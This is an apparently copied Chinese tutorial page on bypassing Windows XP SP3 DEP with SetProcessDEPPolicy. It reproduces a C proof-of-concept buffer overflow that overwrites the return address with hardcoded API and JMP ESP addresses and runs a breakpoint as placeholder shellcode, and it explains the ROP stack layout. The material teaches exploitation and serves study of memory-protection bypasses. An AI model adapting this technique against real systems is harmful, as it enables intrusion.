摘要:
如果策略设置为AlwaysOn,则SetProcessDEPPolicy将引发错误。如果模块与/NXCCOMPAT链接,则此技术不会成功。最后但同样重要的是,它可以由进程调用一次。Bernardo Damele写了一篇关于这项技术的博客文章:http://bernardodamele.blogspot.com/2009/12/dep-bypass-with-setprocessdeppolicy.html功能原型如下:BOOLWINAPISetprocessDEPPolicy;此函数需要一个必须设置为0的参数才能禁用当前进程的DEP。
- /*
- This is a proof of concept of buffer overflow exploitation with DEP
- bypass on Windows XP Professional SP3 english updated on December 9,
- 2009 with DEP manually set to OptOut so enabled for all processes,
- except the ones that are put in the exception list and this program
- is not.
- This source has been compiled with Microsoft Visual C++ 2008 Express
- Edition in Release mode with the default flags. This includes
- /NXCOMPAT and /GS.
- Buffer Security Check (stack cookie, /GS flag) does not need to be
- bypassed because the string buffer, buf, in this example is long
- 4 bytes, so the compiler does not add the GS cookie to the
- useSetProcessDEPPolicy() function. Remember that strict_gs_check
- pragma by default is turned off.
- References:
- * 'New NX APIs added to Windows Vista SP1, Windows XP SP3 and Windows
- Server 2008' by Michael Howard,
- http://blogs.msdn.com/michael_howard/archive/2008/01/29/new-nx-apis-added-to-windows-vista-sp1-windows-xp-sp3-and-windows-server-2008.aspx
- * SetProcessDEPPolicy Function,
- http://msdn.microsoft.com/en-us/library/bb736299%28VS.85%29.aspx
- Feel free to write me for comments and questions,
- Bernardo Damele A. G. <bernardo.damele@gmail.com>
- */
- #include <windows.h>
- #include <stdlib.h>
- void useSetProcessDEPPolicy()
- {
- char buf[4];
- /* Overflow the string buffer and EBP register. */
- strcpy(buf,"AAAABBBB");
- /* SetProcessDEPPolicy() API has been added to Windows Vista SP1,
- Windows XP SP3 and Windows Server 2008 and can be abused by an
- attacker while exploiting a buffer overflow vulnerability to disable
- hardware-enforced DEP (NX/XD bit) for the running process.
- Overwrite EIP with the address of SetProcessDepPolicy() API, which
- is 0x7c8622a4 on a Windows XP SP3 English 32bit system updated on
- December 9, 2009.
- NOTE: You might need to adapt it depending on your system patch
- level. */
- memcpy(buf+8,"\xa4\x22\x86\x7c", 4);
- /* Return address of SetProcessDepPolicy().
- Use an address of a JMP ESP instruction in kernel32.dll to jump to our
- shellcode on the top of the stack.
- NOTE: You might need to adapt it depending on your system patch
- level. */
- memcpy(buf+12,"\x13\x44\x87\x7c", 4);
- /* Argument for SetProcessDepPolicy().
- 0x00000000 turn off DEP for this process. */
- memcpy(buf+16,"\x00\x00\x00\x00", 4);
- /* The shellcode to be executed after DEP has been disabled.
- For instance, a breakpoint (INT 3 instruction) to call the
- debug exception handler which will pause the process. */
- memcpy(buf+20,"\xcc", 1);
- }
- int main()
- {
- useSetProcessDEPPolicy();
- return0;
- }利用SetProcessDEPPolicy来关闭DEP
适用在:Windows XP SP3,Vista SP1 和Windows 2008。
为了能使这个函数有效,当前的DEP 策略必须设成OptIn 或者OptOut。如果策略被设成
AlwaysOn(或者AlwaysOff),然后SetProcessDEPPolicy 将会抛出一个错误。如果一个模块
是以/NXCOMPAT 链接的,这个技术也将不会成功。最后,同等重要的是,它这能被进程调
用一次。因此如果这个函数已经被当前进程调用(如IE8,当程序开始时已经调用它),它
将不成功。
Bernardo Damele 写了一篇关于这一技术的博文:
http://bernardodamele.blogspot.com/2009/12/dep-bypass-with-setprocessdeppolicy.html
函数原型如下:
BOOLWINAPI SetprocessDEPPolicy(
__in DWORD dwFlags
);
这个函数需要一个参数,并且这个参数必须设置为0,以此禁用当前进程的DEP。
为了在ROP 链中使用这个函数,你需要在栈上这样设置:
●指向SetProcessDEPPolicy 的指针
●指向shellcode 的指针
●0
指向shellcode 的指针用于确保当SetProcessDEPPolicy()执行完ROP链后会跳到shellcode。
在XP SP3 下SetProcessDEPPolicy 的地址是7C8622A4(kernel32.dll)http://bernardodamele.blogspot.com/2009/12/dep-bypass-with-setprocessdeppolicy.html